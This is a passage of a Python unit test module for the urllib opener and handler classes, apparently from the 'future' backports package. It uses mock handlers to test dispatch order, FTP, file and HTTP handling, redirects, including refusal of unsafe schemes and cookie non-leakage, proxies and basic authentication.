                code = int(code)
            except ValueError:
                pass
            res = MockResponse(200, "OK", {}, "")
            return self.parent.error("http", args[0], res, code, "", {})
        elif action == "raise":
            raise urllib_error.URLError("blah")
        assert False
    def close(self): pass
    def add_parent(self, parent):
        self.parent = parent
        self.parent.calls = []
    def __lt__(self, other):
        if not hasattr(other, "handler_order"):
            # No handler_order, leave in original order. Yuck.
            return True
        return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
    """Create MockHandlers from meth_spec and register them on opener.

    meth_spec is a list of method-spec lists, one list per handler.  Each
    entry is either a method name (the method records its call and returns
    None) or a (name, action) tuple (the method performs the action described
    in MockHandler.handle()).  For example::

        [["http_error", "ftp_open"], ["http_open"]]

    builds one handler with .http_error()/.ftp_open() and a second one with
    .http_open().  Handlers receive strictly increasing handler_order values
    so their invocation order is deterministic.  Returns the handler list.
    """
    handlers = []
    for offset, meths in enumerate(meth_spec):
        # A fresh subclass per handler: _define_methods mutates the class.
        class MockHandlerSubclass(MockHandler):
            pass
        handler = MockHandlerSubclass(meths)
        handler.handler_order += offset
        handler.add_parent(opener)
        handlers.append(handler)
        opener.add_handler(handler)
    return handlers
def build_test_opener(*handler_instances):
    """Return an OpenerDirector with the given handler objects installed."""
    director = OpenerDirector()
    for handler in handler_instances:
        director.add_handler(handler)
    return director
class MockHTTPHandler(urllib_request.BaseHandler):
    # useful for testing redirections and auth
    # sends supplied headers and code as first response
    # sends 200 OK as second response
    def __init__(self, code, headers):
        self.code = code
        self.headers = headers
        self.reset()
    def reset(self):
        # Forget previous traffic so a handler instance can be reused.
        self._count = 0
        self.requests = []
    def http_open(self, req):
        import future.backports.email as email
        from future import standard_library
        http = import_('http.client', backport=True)
        import copy
        # Deep-copy: the opener mutates the request object during redirects.
        self.requests.append(copy.deepcopy(req))
        if self._count == 0:
            # First request: answer with the configured status/headers.
            self._count = self._count + 1
            name = http.client.responses[self.code]
            msg = email.message_from_string(self.headers)
            return self.parent.error(
                "http", req, MockFile(), self.code, name, msg)
        else:
            # Every subsequent request succeeds with an empty 200 OK body.
            self.req = req
            msg = email.message_from_string("\r\n\r\n")
            return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockHTTPSHandler(urllib_request.AbstractHTTPHandler):
    # Useful for testing the Proxy-Authorization request by verifying the
    # properties of httpcon
    def __init__(self):
        urllib_request.AbstractHTTPHandler.__init__(self)
        # Shared connection stub; tests inspect it after a request is made.
        self.httpconn = MockHTTPClass()
    def https_open(self, req):
        return self.do_open(self.httpconn, req)
class MockPasswordManager(object):
    """Password-manager stub: hands back the one stored credential for any query."""

    def add_password(self, realm, uri, user, password):
        # Only a single credential is kept; a new add overwrites the old one.
        self.realm, self.url = realm, uri
        self.user, self.password = user, password

    def find_user_password(self, realm, authuri):
        # Record what was requested so tests can assert on the lookup target.
        self.target_realm, self.target_url = realm, authuri
        return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
    """Tests for OpenerDirector: handler registration, dispatch order,
    error propagation, and *_request/*_response processor calls."""

    def test_add_non_handler(self):
        # An object exposing no handler-style methods must be rejected.
        class NonHandler(object):
            pass
        self.assertRaises(TypeError,
                          OpenerDirector().add_handler, NonHandler())

    def test_badly_named_methods(self):
        # test work-around for three methods that accidentally follow the
        # naming conventions for handler methods
        # (*_open() / *_request() / *_response())

        # These used to call the accidentally-named methods, causing a
        # TypeError in real code; here, returning self from these mock
        # methods would either cause no exception, or AttributeError.
        from future.backports.urllib.error import URLError
        o = OpenerDirector()
        meth_spec = [
            [("do_open", "return self"), ("proxy_open", "return self")],
            [("redirect_request", "return self")],
            ]
        add_ordered_mock_handlers(o, meth_spec)
        o.add_handler(urllib_request.UnknownHandler())
        for scheme in "do", "proxy", "redirect":
            # None of the badly-named methods should be treated as an
            # "<scheme>_open" handler, so open() must fail with URLError.
            self.assertRaises(URLError, o.open, scheme + "://example.com/")

    def test_handled(self):
        # handler returning non-None means no more handlers will be called
        o = OpenerDirector()
        meth_spec = [
            ["http_open", "ftp_open", "http_error_302"],
            ["ftp_open"],
            [("http_open", "return self")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        r = o.open(req)
        # Second .http_open() gets called, third doesn't, since second returned
        # non-None.  Handlers without .http_open() never get any methods called
        # on them.
        # In fact, second mock handler defining .http_open() returns self
        # (instead of response), which becomes the OpenerDirector's return
        # value.
        self.assertEqual(r, handlers[2])
        calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
        for expected, got in zip(calls, o.calls):
            handler, name, args, kwds = got
            self.assertEqual((handler, name), expected)
            self.assertEqual(args, (req,))

    def test_handler_order(self):
        # Handlers are invoked by ascending .handler_order, not insertion order.
        o = OpenerDirector()
        handlers = []
        for meths, handler_order in [
                ([("http_open", "return self")], 500),
                (["http_open"], 0),
                ]:
            class MockHandlerSubclass(MockHandler): pass
            h = MockHandlerSubclass(meths)
            h.handler_order = handler_order
            handlers.append(h)
            o.add_handler(h)

        o.open("http://example.com/")
        # handlers called in reverse order, thanks to their sort order
        self.assertEqual(o.calls[0][0], handlers[1])
        self.assertEqual(o.calls[1][0], handlers[0])

    def test_raise(self):
        # raising URLError stops processing of request
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "raise")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        self.assertRaises(urllib_error.URLError, o.open, req)
        # Only the raising handler got called; the second never ran.
        self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])

    def test_http_error(self):
        # XXX http_error_default
        # http errors are a special case
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "error 302")],
            [("http_error_400", "raise"), "http_open"],
            [("http_error_302", "return response"), "http_error_303",
             "http_error"],
            [("http_error_302")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        class Unknown(object):
            # Compares equal to anything, so the MockFile argument in the
            # expected call record matches whatever was actually passed.
            def __eq__(self, other): return True

        req = Request("http://example.com/")
        o.open(req)
        assert len(o.calls) == 2
        calls = [(handlers[0], "http_open", (req,)),
                 (handlers[2], "http_error_302",
                  (req, Unknown(), 302, "", {}))]
        for expected, got in zip(calls, o.calls):
            handler, method_name, args = expected
            self.assertEqual((handler, method_name), got[:2])
            self.assertEqual(args, got[2])

    def test_processors(self):
        # *_request / *_response methods get called appropriately
        o = OpenerDirector()
        meth_spec = [
            [("http_request", "return request"),
             ("http_response", "return response")],
            [("http_request", "return request"),
             ("http_response", "return response")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        o.open(req)
        # processor methods are called on *all* handlers that define them,
        # not just the first handler that handles the request
        calls = [
            (handlers[0], "http_request"), (handlers[1], "http_request"),
            (handlers[0], "http_response"), (handlers[1], "http_response")]

        for i, (handler, name, args, kwds) in enumerate(o.calls):
            if i < 2:
                # *_request
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 1)
                self.assertIsInstance(args[0], Request)
            else:
                # *_response
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 2)
                self.assertIsInstance(args[0], Request)
                # response from opener.open is None, because there's no
                # handler that defines http_open to handle it
                self.assertTrue(args[1] is None or
                                isinstance(args[1], MockResponse))

    def test_method_deprecations(self):
        # The legacy urllib2-style accessor methods must emit
        # DeprecationWarning (attributes replaced them).
        req = Request("http://www.example.com")

        with self.assertWarns(DeprecationWarning):
            req.add_data("data")
        with self.assertWarns(DeprecationWarning):
            req.get_data()
        with self.assertWarns(DeprecationWarning):
            req.has_data()
        with self.assertWarns(DeprecationWarning):
            req.get_host()
        with self.assertWarns(DeprecationWarning):
            req.get_selector()
        with self.assertWarns(DeprecationWarning):
            req.is_unverifiable()
        with self.assertWarns(DeprecationWarning):
            req.get_origin_req_host()
        with self.assertWarns(DeprecationWarning):
            req.get_type()
def sanepathname2url(path):
    """Convert a filesystem *path* to a URL path for file:// test URLs.

    Skips the calling test (via unittest.SkipTest) when the path cannot be
    encoded as UTF-8.  On Windows, pathname2url may produce a result with a
    leading "///"; trim that down to a single "/".
    """
    try:
        path.encode("utf-8")
    except UnicodeEncodeError:
        raise unittest.SkipTest("path is not encodable to utf8")
    result = urllib_request.pathname2url(path)
    # XXX don't ask me about the mac...
    if os.name == "nt" and result.startswith("///"):
        return result[2:]
    return result
class HandlerTests(unittest.TestCase):
    """Tests for the concrete handler classes: FTPHandler, FileHandler,
    AbstractHTTPHandler, HTTPErrorProcessor, HTTPCookieProcessor,
    HTTPRedirectHandler, ProxyHandler, and the Basic/Digest auth handlers."""

    def test_ftp(self):
        class MockFTPWrapper(object):
            # Records the retrfile() arguments and serves canned data.
            def __init__(self, data): self.data = data
            def retrfile(self, filename, filetype):
                self.filename, self.filetype = filename, filetype
                return io.StringIO(self.data), len(self.data)
            def close(self): pass

        class NullFTPHandler(urllib_request.FTPHandler):
            # FTPHandler that never opens a real connection; instead it
            # records connect_ftp()'s arguments for the assertions below.
            def __init__(self, data): self.data = data
            def connect_ftp(self, user, passwd, host, port, dirs,
                            timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
                self.user, self.passwd = user, passwd
                self.host, self.port = host, port
                self.dirs = dirs
                self.ftpwrapper = MockFTPWrapper(self.data)
                return self.ftpwrapper

        import ftplib
        data = "rheum rhaponicum"
        h = NullFTPHandler(data)
        h.parent = MockOpener()

        # Each row: URL plus the host/port/user/passwd/type/dirs/filename/
        # mimetype values the handler is expected to derive from it.
        for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
            ("ftp://localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%25parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%2542parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://localhost:80/foo/bar/",
             "localhost", 80, "", "", "D",
             ["foo", "bar"], "", None),
            ("ftp://localhost/baz.gif;type=a",
             "localhost", ftplib.FTP_PORT, "", "", "A",
             [], "baz.gif", None),  # XXX really this should guess image/gif
            ]:
            req = Request(url)
            req.timeout = None
            r = h.ftp_open(req)
            # ftp authentication not yet implemented by FTPHandler
            self.assertEqual(h.user, user)
            self.assertEqual(h.passwd, passwd)
            self.assertEqual(h.host, socket.gethostbyname(host))
            self.assertEqual(h.port, port)
            self.assertEqual(h.dirs, dirs)
            self.assertEqual(h.ftpwrapper.filename, filename)
            self.assertEqual(h.ftpwrapper.filetype, type_)
            headers = r.info()
            self.assertEqual(headers.get("Content-type"), mimetype)
            self.assertEqual(int(headers["Content-length"]), len(data))

    def test_file(self):
        import future.backports.email.utils as email_utils
        import socket
        h = urllib_request.FileHandler()
        o = h.parent = MockOpener()

        TESTFN = support.TESTFN
        urlpath = sanepathname2url(os.path.abspath(TESTFN))
        towrite = b"hello, world\n"
        # URL spellings that must all resolve to the same local file.
        urls = [
            "file://localhost%s" % urlpath,
            "file://%s" % urlpath,
            "file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
            ]
        try:
            localaddr = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:
            localaddr = ''
        if localaddr:
            urls.append("file://%s%s" % (localaddr, urlpath))

        for url in urls:
            f = open(TESTFN, "wb")
            try:
                try:
                    f.write(towrite)
                finally:
                    f.close()

                r = h.file_open(Request(url))
                try:
                    data = r.read()
                    headers = r.info()
                    respurl = r.geturl()
                finally:
                    r.close()
                stats = os.stat(TESTFN)
                modified = email_utils.formatdate(stats.st_mtime, usegmt=True)
            finally:
                os.remove(TESTFN)
            self.assertEqual(data, towrite)
            self.assertEqual(headers["Content-type"], "text/plain")
            self.assertEqual(headers["Content-length"], "13")
            self.assertEqual(headers["Last-modified"], modified)
            self.assertEqual(respurl, url)

        # These malformed/remote file URLs must all raise URLError.
        for url in [
            "file://localhost:80%s" % urlpath,
            "file:///file_does_not_exist.txt",
            "file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
                                   os.getcwd(), TESTFN),
            "file://somerandomhost.ontheinternet.com%s/%s" %
            (os.getcwd(), TESTFN),
            ]:
            try:
                f = open(TESTFN, "wb")
                try:
                    f.write(towrite)
                finally:
                    f.close()

                self.assertRaises(urllib_error.URLError,
                                  h.file_open, Request(url))
            finally:
                os.remove(TESTFN)

        h = urllib_request.FileHandler()
        o = h.parent = MockOpener()
        # XXXX why does // mean ftp (and /// mean not ftp!), and where
        # is file: scheme specified?  I think this is really a bug, and
        # what was intended was to distinguish between URLs like:
        # file:/blah.txt (a file)
        # file://localhost/blah.txt (a file)
        # file:///blah.txt (a file)
        # file://ftp.example.com/blah.txt (an ftp URL)
        for url, ftp in [
            ("file://ftp.example.com//foo.txt", False),
            ("file://ftp.example.com///foo.txt", False),
            # XXXX bug: fails with OSError, should be URLError
            ("file://ftp.example.com/foo.txt", False),
            ("file://somehost//foo/something.txt", False),
            ("file://localhost//foo/something.txt", False),
            ]:
            req = Request(url)
            try:
                h.file_open(req)
            # XXXX remove OSError when bug fixed
            except (urllib_error.URLError, OSError):
                self.assertFalse(ftp)
            else:
                self.assertIs(o.req, req)
                self.assertEqual(req.type, "ftp")
            self.assertEqual(req.type == "ftp", ftp)

    def test_http(self):
        h = urllib_request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        for method, data in [("GET", None), ("POST", b"blah")]:
            req = Request(url, data, {"Foo": "bar"})
            req.timeout = None
            req.add_unredirected_header("Spam", "eggs")
            http = MockHTTPClass()
            r = h.do_open(http, req)

            # result attributes
            r.read; r.readline  # wrapped MockFile methods
            r.info; r.geturl  # addinfourl methods
            r.code, r.msg == 200, "OK"  # added from MockHTTPClass.getreply()
            hdrs = r.info()
            hdrs.get; hdrs.__contains__  # r.info() gives dict from .getreply()
            self.assertEqual(r.geturl(), url)

            self.assertEqual(http.host, "example.com")
            self.assertEqual(http.level, 0)
            self.assertEqual(http.method, method)
            self.assertEqual(http.selector, "/")
            self.assertEqual(http.req_headers,
                             [("Connection", "close"),
                              ("Foo", "bar"), ("Spam", "eggs")])
            self.assertEqual(http.data, data)

        # check socket.error converted to URLError
        http.raise_on_endheaders = True
        self.assertRaises(urllib_error.URLError, h.do_open, http, req)

        # Check for TypeError on POST data which is str.
        req = Request("http://example.com/", "badpost")
        self.assertRaises(TypeError, h.do_request_, req)

        # check adding of standard headers
        o.addheaders = [("Spam", "eggs")]
        for data in b"", None:  # POST, GET
            req = Request("http://example.com/", data)
            r = MockResponse(200, "OK", {}, "")
            newreq = h.do_request_(req)
            if data is None:  # GET
                self.assertNotIn("Content-length", req.unredirected_hdrs)
                self.assertNotIn("Content-type", req.unredirected_hdrs)
            else:  # POST
                self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
                self.assertEqual(req.unredirected_hdrs["Content-type"],
                                 "application/x-www-form-urlencoded")
            # XXX the details of Host could be better tested
            self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
            self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")

            # don't clobber existing headers
            req.add_unredirected_header("Content-length", "foo")
            req.add_unredirected_header("Content-type", "bar")
            req.add_unredirected_header("Host", "baz")
            req.add_unredirected_header("Spam", "foo")
            newreq = h.do_request_(req)
            self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
            self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
            self.assertEqual(req.unredirected_hdrs["Host"], "baz")
            self.assertEqual(req.unredirected_hdrs["Spam"], "foo")

        # Check iterable body support
        def iterable_body():
            yield b"one"
            yield b"two"
            yield b"three"

        for headers in {}, {"Content-Length": 11}:
            req = Request("http://example.com/", iterable_body(), headers)
            if not headers:
                # Having an iterable body without a Content-Length should
                # raise an exception
                self.assertRaises(ValueError, h.do_request_, req)
            else:
                newreq = h.do_request_(req)

        # A file object.
        # Test only Content-Length attribute of request.
        file_obj = io.BytesIO()
        file_obj.write(b"Something\nSomething\nSomething\n")

        for headers in {}, {"Content-Length": 30}:
            req = Request("http://example.com/", file_obj, headers)
            if not headers:
                # Having an iterable body without a Content-Length should
                # raise an exception
                self.assertRaises(ValueError, h.do_request_, req)
            else:
                newreq = h.do_request_(req)
                self.assertEqual(int(newreq.get_header('Content-length')), 30)

        file_obj.close()

        # array.array Iterable - Content Length is calculated
        iterable_array = array.array(text_to_native_str("I"),
                                     [1, 2, 3, 4])
        for headers in {}, {"Content-Length": 16}:
            req = Request("http://example.com/", iterable_array, headers)
            newreq = h.do_request_(req)
            self.assertEqual(int(newreq.get_header('Content-length')), 16)

    def test_http_doubleslash(self):
        # Checks the presence of any unnecessary double slash in url does not
        # break anything. Previously, a double slash directly after the host
        # could cause incorrect parsing.
        h = urllib_request.AbstractHTTPHandler()
        h.parent = MockOpener()

        data = b""
        ds_urls = [
            "http://example.com/foo/bar/baz.html",
            "http://example.com//foo/bar/baz.html",
            "http://example.com/foo//bar/baz.html",
            "http://example.com/foo/bar//baz.html"
            ]

        for ds_url in ds_urls:
            ds_req = Request(ds_url, data)

            # Check whether host is determined correctly if there is no proxy
            np_ds_req = h.do_request_(ds_req)
            self.assertEqual(np_ds_req.unredirected_hdrs["Host"], "example.com")

            # Check whether host is determined correctly if there is a proxy
            ds_req.set_proxy("someproxy:3128", None)
            p_ds_req = h.do_request_(ds_req)
            self.assertEqual(p_ds_req.unredirected_hdrs["Host"], "example.com")

    def test_fixpath_in_weirdurls(self):
        # Issue4493: urllib2 to supply '/' when to urls where path does not
        # start with'/'
        h = urllib_request.AbstractHTTPHandler()
        h.parent = MockOpener()

        weird_url = 'http://www.python.org?getspam'
        req = Request(weird_url)
        newreq = h.do_request_(req)
        self.assertEqual(newreq.host, 'www.python.org')
        self.assertEqual(newreq.selector, '/?getspam')

        url_without_path = 'http://www.python.org'
        req = Request(url_without_path)
        newreq = h.do_request_(req)
        self.assertEqual(newreq.host, 'www.python.org')
        self.assertEqual(newreq.selector, '')

    def test_errors(self):
        h = urllib_request.HTTPErrorProcessor()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        req = Request(url)
        # all 2xx are passed through
        r = MockResponse(200, "OK", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        r = MockResponse(202, "Accepted", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        r = MockResponse(206, "Partial content", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        # anything else calls o.error (and MockOpener returns None, here)
        r = MockResponse(502, "Bad gateway", {}, "", url)
        self.assertIsNone(h.http_response(req, r))
        self.assertEqual(o.proto, "http")  # o.error called
        self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))

    def test_cookies(self):
        # HTTPCookieProcessor must feed the request/response pair to the jar.
        cj = MockCookieJar()
        h = urllib_request.HTTPCookieProcessor(cj)
        h.parent = MockOpener()

        req = Request("http://example.com/")
        r = MockResponse(200, "OK", {}, "")
        newreq = h.http_request(req)
        self.assertIs(cj.ach_req, req)
        self.assertIs(cj.ach_req, newreq)
        self.assertEqual(req.origin_req_host, "example.com")
        self.assertFalse(req.unverifiable)
        newr = h.http_response(req, r)
        self.assertIs(cj.ec_req, req)
        self.assertIs(cj.ec_r, r)
        self.assertIs(r, newr)

    def test_redirect(self):
        from_url = "http://example.com/a.html"
        to_url = "http://example.com/b.html"
        h = urllib_request.HTTPRedirectHandler()
        o = h.parent = MockOpener()

        # ordinary redirect behaviour
        for code in 301, 302, 303, 307:
            for data in None, "blah\nblah\n":
                method = getattr(h, "http_error_%s" % code)
                req = Request(from_url, data)
                req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
                req.add_header("Nonsense", "viking=withhold")
                if data is not None:
                    req.add_header("Content-Length", str(len(data)))
                req.add_unredirected_header("Spam", "spam")
                try:
                    method(req, MockFile(), code, "Blah",
                           MockHeaders({"location": to_url}))
                except urllib_error.HTTPError:
                    # 307 in response to POST requires user OK
                    self.assertTrue(code == 307 and data is not None)
                self.assertEqual(o.req.get_full_url(), to_url)
                try:
                    self.assertEqual(o.req.get_method(), "GET")
                except AttributeError:
                    self.assertFalse(o.req.data)

                # now it's a GET, there should not be headers regarding content
                # (possibly dragged from before being a POST)
                headers = [x.lower() for x in o.req.headers]
                self.assertNotIn("content-length", headers)
                self.assertNotIn("content-type", headers)

                self.assertEqual(o.req.headers["Nonsense"],
                                 "viking=withhold")
                self.assertNotIn("Spam", o.req.headers)
                self.assertNotIn("Spam", o.req.unredirected_hdrs)

        # loop detection
        req = Request(from_url)
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT

        def redirect(h, req, url=to_url):
            h.http_error_302(req, MockFile(), 302, "Blah",
                             MockHeaders({"location": url}))
        # Note that the *original* request shares the same record of
        # redirections with the sub-requests caused by the redirections.

        # detect infinite loop redirect of a URL to itself
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/")
                count = count + 1
        except urllib_error.HTTPError:
            # don't stop until max_repeats, because cookies may introduce state
            self.assertEqual(count, urllib_request.HTTPRedirectHandler.max_repeats)

        # detect endless non-repeating chain of redirects
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/%d" % count)
                count = count + 1
        except urllib_error.HTTPError:
            self.assertEqual(count,
                             urllib_request.HTTPRedirectHandler.max_redirections)

    def test_invalid_redirect(self):
        # Redirects to non-HTTP(S)/FTP schemes are a security hole and must
        # be refused with HTTPError.
        from_url = "http://example.com/a.html"
        valid_schemes = ['http', 'https', 'ftp']
        invalid_schemes = ['file', 'imap', 'ldap']
        schemeless_url = "example.com/b.html"
        h = urllib_request.HTTPRedirectHandler()
        o = h.parent = MockOpener()
        req = Request(from_url)
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT

        for scheme in invalid_schemes:
            invalid_url = scheme + '://' + schemeless_url
            self.assertRaises(urllib_error.HTTPError, h.http_error_302,
                              req, MockFile(), 302, "Security Loophole",
                              MockHeaders({"location": invalid_url}))

        for scheme in valid_schemes:
            valid_url = scheme + '://' + schemeless_url
            h.http_error_302(req, MockFile(), 302, "That's fine",
                             MockHeaders({"location": valid_url}))
            self.assertEqual(o.req.get_full_url(), valid_url)

    def test_relative_redirect(self):
        # A relative Location header is resolved against the original URL.
        from future.backports.urllib import parse as urllib_parse
        from_url = "http://example.com/a.html"
        relative_url = "/b.html"
        h = urllib_request.HTTPRedirectHandler()
        o = h.parent = MockOpener()
        req = Request(from_url)
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT

        valid_url = urllib_parse.urljoin(from_url, relative_url)
        h.http_error_302(req, MockFile(), 302, "That's fine",
                         MockHeaders({"location": valid_url}))
        self.assertEqual(o.req.get_full_url(), valid_url)

    def test_cookie_redirect(self):
        # cookies shouldn't leak into redirected requests
        from future.backports.http.cookiejar import CookieJar
        from future.tests.test_http_cookiejar import interact_netscape

        cj = CookieJar()
        interact_netscape(cj, "http://www.example.com/", "spam=eggs")
        hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
        hdeh = urllib_request.HTTPDefaultErrorHandler()
        hrh = urllib_request.HTTPRedirectHandler()
        cp = urllib_request.HTTPCookieProcessor(cj)
        o = build_test_opener(hh, hdeh, hrh, cp)
        o.open("http://www.example.com/")
        self.assertFalse(hh.req.has_header("Cookie"))

    def test_redirect_fragment(self):
        # A fragment in the redirect target must survive (minus whitespace).
        redirected_url = 'http://www.example.com/index.html#OK\r\n\r\n'
        hh = MockHTTPHandler(302, 'Location: ' + redirected_url)
        hdeh = urllib_request.HTTPDefaultErrorHandler()
        hrh = urllib_request.HTTPRedirectHandler()
        o = build_test_opener(hh, hdeh, hrh)
        fp = o.open('http://www.example.com')
        self.assertEqual(fp.geturl(), redirected_url.strip())

    def test_proxy(self):
        o = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(http="proxy.example.com:3128"))
        o.add_handler(ph)
        meth_spec = [
            [("http_open", "return response")]
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://acme.example.com/")
        self.assertEqual(req.host, "acme.example.com")
        o.open(req)
        # ProxyHandler rewrote the request's host to the proxy.
        self.assertEqual(req.host, "proxy.example.com:3128")

        self.assertEqual([(handlers[0], "http_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_no_proxy(self):
        # Hosts matched by the no_proxy environment variable bypass the proxy.
        os.environ['no_proxy'] = 'python.org'
        o = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(http="proxy.example.com"))
        o.add_handler(ph)
        req = Request("http://www.perl.org/")
        self.assertEqual(req.host, "www.perl.org")
        o.open(req)
        self.assertEqual(req.host, "proxy.example.com")
        req = Request("http://www.python.org")
        self.assertEqual(req.host, "www.python.org")
        o.open(req)
        self.assertEqual(req.host, "www.python.org")
        del os.environ['no_proxy']

    def test_proxy_no_proxy_all(self):
        # no_proxy='*' disables proxying for every host.
        os.environ['no_proxy'] = '*'
        o = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(http="proxy.example.com"))
        o.add_handler(ph)
        req = Request("http://www.python.org")
        self.assertEqual(req.host, "www.python.org")
        o.open(req)
        self.assertEqual(req.host, "www.python.org")
        del os.environ['no_proxy']

    def test_proxy_https(self):
        o = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(https="proxy.example.com:3128"))
        o.add_handler(ph)
        meth_spec = [
            [("https_open", "return response")]
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("https://www.example.com/")
        self.assertEqual(req.host, "www.example.com")
        o.open(req)
        self.assertEqual(req.host, "proxy.example.com:3128")
        self.assertEqual([(handlers[0], "https_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_https_proxy_authorization(self):
        o = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(https='proxy.example.com:3128'))
        o.add_handler(ph)
        https_handler = MockHTTPSHandler()
        o.add_handler(https_handler)
        req = Request("https://www.example.com/")
        req.add_header("Proxy-Authorization", "FooBar")
        req.add_header("User-Agent", "Grail")
        self.assertEqual(req.host, "www.example.com")
        self.assertIsNone(req._tunnel_host)
        o.open(req)
        # Verify Proxy-Authorization gets tunneled to request.
        # httpsconn req_headers do not have the Proxy-Authorization header but
        # the req will have.
        self.assertNotIn(("Proxy-Authorization", "FooBar"),
                         https_handler.httpconn.req_headers)
        self.assertIn(("User-Agent", "Grail"),
                      https_handler.httpconn.req_headers)
        self.assertIsNotNone(req._tunnel_host)
        self.assertEqual(req.host, "proxy.example.com:3128")
        self.assertEqual(req.get_header("Proxy-authorization"), "FooBar")

    # TODO: This should be only for OSX
    @unittest.skipUnless(sys.platform == 'darwin', "only relevant for OSX")
    def test_osx_proxy_bypass(self):
        bypass = {
            'exclude_simple': False,
            'exceptions': ['foo.bar', '*.bar.com', '127.0.0.1', '10.10',
                           '10.0/16']
        }
        # Check hosts that should trigger the proxy bypass
        for host in ('foo.bar', 'www.bar.com', '127.0.0.1', '10.10.0.1',
                     '10.0.0.1'):
            self.assertTrue(_proxy_bypass_macosx_sysconf(host, bypass),
                            'expected bypass of %s to be True' % host)
        # Check hosts that should not trigger the proxy bypass
        for host in ('abc.foo.bar', 'bar.com', '127.0.0.2', '10.11.0.1', 'test'):
            self.assertFalse(_proxy_bypass_macosx_sysconf(host, bypass),
                             'expected bypass of %s to be False' % host)

        # Check the exclude_simple flag
        bypass = {'exclude_simple': True, 'exceptions': []}
        self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))

    def test_basic_auth(self, quote_char='"'):
        # quote_char parameterizes how the server quotes the realm; reused by
        # test_basic_auth_with_single_quoted_realm below.
        opener = OpenerDirector()
        password_manager = MockPasswordManager()
        auth_handler = urllib_request.HTTPBasicAuthHandler(password_manager)
        realm = "ACME Widget Store"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
            (quote_char, realm, quote_char))
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )

    def test_basic_auth_with_single_quoted_realm(self):
        self.test_basic_auth(quote_char="'")

    def test_basic_auth_with_unquoted_realm(self):
        # An unquoted realm is accepted but emits a UserWarning.
        opener = OpenerDirector()
        password_manager = MockPasswordManager()
        auth_handler = urllib_request.HTTPBasicAuthHandler(password_manager)
        realm = "ACME Widget Store"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        with self.assertWarns(UserWarning):
            self._test_basic_auth(opener, auth_handler, "Authorization",
                                  realm, http_handler, password_manager,
                                  "http://acme.example.com/protected",
                                  "http://acme.example.com/protected",
                                  )

    def test_proxy_basic_auth(self):
        opener = OpenerDirector()
        ph = urllib_request.ProxyHandler(dict(http="proxy.example.com:3128"))
        opener.add_handler(ph)
        password_manager = MockPasswordManager()
